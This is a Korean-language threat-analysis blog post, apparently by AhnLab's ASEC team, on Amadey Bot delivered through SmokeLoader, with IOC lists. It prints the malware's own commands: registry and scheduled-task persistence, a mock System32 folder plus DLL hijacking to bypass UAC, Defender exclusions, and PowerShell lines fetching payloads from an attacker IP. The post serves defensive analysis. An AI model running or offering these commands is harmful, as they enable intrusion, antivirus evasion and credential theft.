SmokeLoader를 통해 유포 중인 Amadey Bot

Amadey Bot은 2018년경부터 확인되는 악성코드로서 공격자의 명령을 받아 정보 탈취나 추가 악성코드를 설치할 수 있다. 일반적인 악성코드들처럼 Amadey 또한 불법 포럼 등을 통해 판매되고 있으며, 이에 따라 현재까지도 다양한 공격자들에 의해 사용되고 있다.

ASEC 분석팀에서는 2019년 ASEC 블로그를 통해 Amadey가 공격에 사용된 사례들을 공개한 바 있다. 대표적으로 GandCrab 랜섬웨어 공격자들에 의해 랜섬웨어를 설치하는 데 사용되거나, Clop 랜섬웨어로 유명한 TA505 그룹에 의해 FlawedAmmyy를 설치하는 데 사용되었다. 이외에도 Fallout Exploit Kit이나 Rig Exploit Kit 공격자들도 Amadey를 공격에 이용했던 것으로 알려져 있다.

ASEC 분석팀은 최근 Amadey가 SmokeLoader에 의해 설치되고 있는 것을 확인하였다. SmokeLoader는 과거 수년 전부터 꾸준히 유포되고 있으며 ASEC 통계 기준 최근까지도 높은 점유율을 차지하고 있는 악성코드이다. 최근에는 주로 정상 소프트웨어 크랙 및 시리얼 생성 프로그램을 위장한 유포 사이트에서 사용자가 직접 다운로드하는 방식으로 유포 중이다.

SmokeLoader는 정보 탈취와 관련된 다수의 추가 기능을 플러그인 형태로 제공하며 일반적으로 다운로더 악성코드로서 추가 악성코드를 설치하는 목적으로 사용된다. SmokeLoader가 실행되면 현재 실행 중인 탐색기 프로세스 즉 explorer.exe에 Main Bot을 인젝션하기 때문에 실질적인 악성 행위를 담당하는 Bot은 탐색기 프로세스 내부에서 동작한다. 다음은 자사 ASD 로그로서 탐색기에 인젝션된 SmokeLoader가 Amadey를 다운로드하는 행위를 보여준다.

[그림 1] 탐색기 프로세스에 인젝션된 스모크로더에 의해 다운로드되는 Amadey

Amadey가 실행되면 먼저 자신을 다음과 같은 Temp 경로에 복사한다. 그리고 해당 폴더 즉 Amadey가 존재하는 폴더를 시작 폴더로 등록하여 재부팅 후에도 실행될 수 있도록 한다. Amadey는 이외에도 지속성 유지를 위해 자신을 작업 스케줄러에 등록하는 기능도 함께 제공한다.

Amadey 설치 경로
> %TEMP%\9487d68b99\bguuwe.exe

작업 스케줄러에 등록하는 명령
> cmd.exe /C REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” /f /v Startup /t REG_SZ /d %TEMP%\9487d68b99\
> schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR “%TEMP%\9487d68b99\bguuwe.exe” /
F

[그림 2] 자사 ASD 로그에서 확인되는 Amadey 악성코드

여기까지의 과정이 끝나면 C&C 서버와의 통신이 시작된다. 다음을 Fiddler 로그를 보면 C&C 서버와의 통신 외에도 cred.dll 플러그인을 다운로드해 사용자 환경의 정보를 수집해 C&C 서버로 탈취하는 기능과 추가 악성코드로서 RedLine 인포스틸러 악성코드를 설치하는 것을 확인할 수 있다.

[그림 3] Amadey의 네트워크 트래픽

Amadey는 C&C 서버에 접속하기 이전에 감염 시스템의 정보를 수집한다. 수집하는 정보들로는 컴퓨터 이름, 사용자 이름과 같은 기본적인 정보들 외에도 설치되어 있는 AntiVirus 제품 등이 있다. 이렇게 수집한 정보는 각 항목별로 포맷에 맞게 C&C 서버에 전달되며 C&C 서버는 Amadey가 다운로드할 추가적인 악성코드의 주소를 응답하여 다운로더로서 동작하게 할 수 있다.

[그림 4] C&C 서버에 전달하는 데이터 및 C&C 서버로부터 전달받는 데이터
항목예시 데이터의미
id129858768759감염 시스템의 ID
vs3.21Amadey 버전
sd37bbd7Amadey ID
os9윈도우 버전
ex) Windows 7 – 9
Windows 10 – 1
Windows Server 2012 – 4
Windows Server 2019 – 16
bi0아키텍처 (x86 – 0, x64 – 1)
ar0관리자 권한 여부 (관리자 권한의 경우 1)
pcPCNAME컴퓨터 이름
unUSERNAME사용자 이름
dmDOMAINNAME도메인 이름
av0설치된 AV 종류
lv00으로 설정
og11로 설정
[표 1] C&C 서버에 전달되는 항목

위의 정보를 통해 현재 실행 중인 Amadey는 3.21 버전인 것을 알 수 있다. 현재 분석 대상 Amadey의 C&C 패널에 접속해 보면 과거 알려진 패널과 비교해서 약간의 차이를 확인할 수 있다.

[그림 5] 과거 Amadey C&C 패널 로그인 화면
[그림 6] 최신 Amadey C&C 패널 로그인 화면

C&C 서버에 전달하는 항목 중 “av”는 감염 환경에 설치된 AntiVirus 정보를 의미하는데 각각 AntiVirus에 상응하는 번호를 의미한다. 참고로 13번은 감염 환경이 윈도우 10이나 윈도우 서버 2019와 같은 환경일 때 선택되는 것으로 보아 WIndows Defender를 의미하는 것으로 추정된다.

AntiVirus 이름번호
X0
Avast Software1
Avira2
Kaspersky Lab3
ESET4
Panda Security5
Dr. Web6
AVG7
360 Total Security8
Bitdefender9
Norton10
Sophos11
Comodo12
Windows Defender (추정)13
[표 2] 설치 여부 검사 대상 AntiVirus 목록

이외에도 Amadey는 C&C 서버에 주기적으로 스크린샷을 찍어서 전달한다. 현재 화면을 JPG 포맷으로 캡쳐하여 %TEMP% 경로에 “129858768759” 이름으로 저장한 후 C&C 서버에 POST 방식으로 전송한다.

[그림 7] 스크린 캡쳐를 C&C 서버에 전송

위에서 확인된 네트워크 트래픽을 보면 “cred.dll” 즉 정보 탈취 목적의 플러그인을 다운로드한 것을 확인할 수 있다. 다운로드된 플러그인은 델파이 (Delphi) 프로그래밍 언어로 개발되어 있으며 %APPDATA% 경로에 다운로드된다. 이후 다음과 같이 Export 함수 Main()을 인자로 하여 rundll32.exe를 통해 실행된다.

> rundll32.exe %APPDATA%\406d6c22b040c6\cred.dll, Main

탈취 대상 정보들은 다음과 같이 이메일, FTP, VPN 클라이언트 등이 있으며 수집한 정보는 동일한 C&C 서버에 전달된다.

정보 탈취 플러그인의 탈취 대상 목록
– Mikrotik 라우터 관리 프로그램 Winbox
– Outlook
– FileZilla
– Pidgin
– Total Commander FTP Client
– RealVNC, TightVNC, TigerVNC
– WinSCP

위의 Fiddler 로그를 보면 Amadey는 cred.dll 플러그인 외에도 “hxxp://185.17.0[.]52/yuri.exe” 주소에서 추가 악성코드를 설치하였다. Amadey가 주기적으로 통신하면서 감염 시스템의 정보를 전달할 때 C&C 서버는 일반적으로 NULL 데이터를 전달하지만 명령에 따라 다운로더 명령을 전달할 수 있다. 다운로더 명령은 인코딩된 데이터와 함께 전달되는데 이를 복호화하면 추가 악성코드를 다운로드할 주소가 나온다. 해당 주소에서 다운로드되는 악성코드는 RedLine 인포스틸러 악성코드이다.

[그림 8] Amadey에 의해 설치되는 RedLine 인포스틸러

참고로 “hxxp://185.17.0[.]52/” 주소에 직접 접속해 보면 다음과 같이 파일들의 목록을 확인할 수 있다.

[그림 9] Amadey 다운로드 페이지

각 파일들은 다음과 같으며 Amadey 및 RedLine 그리고 이를 설치하는 데 사용되는 다운로더 악성코드들이다.

이름분류
Proxy.exe오토잇 다운로더 악성코드
a.exeAmadey (패킹되지 않은 원본)
ama.exeAmadey (a.exe에 NULL 데이터가 추가된 형태)
au.exeAmadey (패킹된 형태)
binAmadey 다운로더 (x64 DLL)
xyz.exe다운로더 (bin을 설치)
yuri.exeRedLine 인포스틸러
[표 3] 악성코드 목록

다운로더 악성코드들인 xyz.exe와 bin은 러스트 (Rust) 프로그래밍 언어로 개발된 것이 특징이다. xyz.exe는 bin을 다운로드하며 추가적으로 UAC Bypass 기법을 이용한 권한 상승 기능도 지원한다. 해당 기법은 UAC Bypass 기법들 중 구체적으로 AutoElevate 프로그램과 AIS의 메커니즘을 악용하는 방식이다. AutoElevate 프로그램은 다음과 같이 “<autoElevate>true</autoElevate>” 속성이 있는 프로그램으로서 특정 조건에 맞을 경우 UAC 팝업 없이 관리자 권한으로 실행될 수 있는 프로그램이다.

[그림 10] AutoElevate 속성을 갖는 FXSUNATD.exe

이를 위해서는 위의 속성 외에도 System32 경로와 같이 신뢰할 수 있는 위치에서 실행되어야 한다. 악성코드는 해당 조건을 만족시키기 위해 다음과 같이 “C:\Windows \System32\” 폴더를 생성하고 여기에 AutoElevate 프로그램인 “FXSUNATD.exe”를 복사하였다. AIS가 내부적으로 경로를 검사할 때 띄어쓰기가 무시됨에 따라 해당 경로에서 “FXSUNATD.exe”가 실행된다면 정상적인 System32 경로로 인지하게 되고 경로 검사에 성공하여 AutoElevate 즉 관리자 권한으로 실행될 수 있다.

> powershell.exe “New-Item -ItemType Directory ‘\?\C:\Windows \System32’; Copy-Item -Path ‘C:\Windows\System32\FXSUNATD.exe’ -Destination ‘C:\Windows \System32\’; powershell -windowstyle hidden $ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest hxxp://185.17.0[.]52/bin -Outfile ‘C:\Windows \System32\version.dll'”

> powershell.exe “Start-Process ‘C:\Windows \System32\FXSUNATD.exe'”

그리고 동일 경로에 악성 DLL을 version.dll이라는 이름으로 다운로드한다. version.dll은 “FXSUNATD.exe”가 사용하는 DLL로서 “FXSUNATD.exe”와 동일 경로에 위치할 경우 “FXSUNATD.exe” 실행 시 DLL 로드 순서에 따라 해당 DLL이 우선적으로 로드되어 실행된다. 이러한 방식을 DLL 하이재킹이라고 하는데 이를 악용하여 악성 DLL의 이름을 version.dll로 하여 동일 경로에 생성한 후 “FXSUNATD.exe”를 실행시킴으로써 악성코드가 정상 프로그램에 로드되어 실행된다.

[그림 11] Amadey 다운로더 악성코드 프로세스 트리

“FXSUNATD.exe”에 의해 로드되어 실행되는 bin 즉 version.dll은 실제 Amadey와 RedLine을 설치하는 다운로더 악성코드이다. 실행되면 먼저 WIndows Defender 명령을 이용해 %ALLUSERSPROFILE% 폴더와 Temp 경로가 포함된 %LOCALAPPDATA% 경로를 검사 예외 경로에 등록한 후 각각의 악성코드를 다운로드해 실행한다.

> powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\ProgramData\; Add-MpPreference -ExclusionPath $env:TEMP\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\msconfig.exe;

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile $env:TEMP\taskhost.exe

Amadey는 과거 익스플로잇 킷을 통해 유포된 것을 시작으로, 최근까지도 상용 소프트웨어의 크랙, 시리얼 다운로드 페이지로 위장한 악성 사이트에서 유포되는 SmokeLoader를 통해 설치되고 있다. Amadey가 설치되면 감염 시스템에 상주하면서 사용자 정보를 탈취할 뿐만 아니라 추가 페이로드를 설치할 수 있다. 사용자들은 OS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.

안랩 제품에서는 해당 악성코드들을 다음과 같이 진단하고 있다.

[파일 진단]
– Trojan/Win.MalPE.R503126 (2022.07.07.01)
– Trojan/Win.Amadey.C5196504 (2022.07.07.02)
– Trojan/Win.Delf.R462350 (2022.01.04.02)
– Trojan/Win.Generic.R503640 (2022.07.09.01)
– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)
– Malware/Win.Trojanspy.R438708 (2021.08.25.01)
– Trojan/Win.Amadey.C5200739 (2022.07.11.00)
– Downloader/Win.Agent.C5198969 (2022.07.10.00)
– Downloader/Win.Agent.C5198968 (2022.07.10.00)

[행위 진단]
– Malware/MDP.Download.M1197
– Execution/MDP.Powershell.M2514

[IOC]
MD5

– c3b7cf4c76cc20e56b180b001535696f (SmokeLoader)
– 6a87b10b372f64f7890def6fbaf08bfc (bguuwe.exe : Amadey)
– 77ce635ba7fb55f0c844077fee828ce7 (cred.dll : Stealer Plugin)
– 0f4351c43a09cb581dc01fe0ec08ff83 (yuri.exe : RedLine)
– 600bb5535d0bfc047f5c61f892477045 (Proxy.exe : 오토잇 다운로더 악성코드)
– 18bb226e2739a3ed48a96f9f92c91359 (a.exe : Amadey – 패킹되지 않은 원본)
– 27f626db46fd22214c1eb6c63193d2a0 (ama.exe : Amadey – a.exe에 NULL 데이터가 추가된 형태)
– 977697e93a3b2635a5b8fb7dc3dfaf6b (au.exe : Amadey – 패킹된 형태)
– f0cdfc42f1c1c0c2d9b518e5cb31c788 (bin : Amadey 다운로더 – x64 DLL)
– 0fd121b4a221c7767bd58f49c3d7cda5 (xyz.exe : 다운로더 – bin을 설치)

다운로드 URL
– hxxp://185.17.0[.]52/yala.exe (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/Plugins/cred.dll (Stealer Plugin)
– hxxp://185.17.0[.]52/yuri.exe (RedLine)
– hxxp://185.17.0[.]52/Proxy.exe (오토잇 다운로더 악성코드)
– hxxp://185.17.0[.]52/a.exe (Amadey – 패킹되지 않은 원본)
– hxxp://185.17.0[.]52/ama.exe (Amadey – a.exe에 NULL 데이터가 추가된 형태)
– hxxp://185.17.0[.]52/au.exe (Amadey – 패킹된 형태)
– hxxp://185.17.0[.]52/bin (Amadey 다운로더 – x64 DLL)
– hxxp://185.17.0[.]52/xyz.exe (다운로더 – bin을 설치)

C2
– hxxp://host-file-host6[.]com (SmokeLoader)
– hxxp://host-host-file8[.]com (SmokeLoader)
– hxxp://teamfighttacticstools[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://nftmatrixed[.]info/5Lsq3FR/index.php (Amadey)
– 185.17.0[.]63:34397 (RedLine)

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

5 1 vote
별점 주기
Subscribe
Notify of
guest

4 댓글
Inline Feedbacks
View all comments
trackback

[…] SmokeLoader를 통해 유포 중인 Amadey Bot (링크) […]

최돈호
최돈호
1 year ago

링크가 404 뜹니다.

trackback

[…] SmokeLoader를 통해 유포 중인 Amadey Bot […]

trackback

[…] 유포 사이트에서 유포되면서 여러 다른 악성코드들을 설치하고 있다.[1] 이외에도 올해 하반기에는 국내 기업 사용자들을 대상으로 하는 LockBit 3.0 […]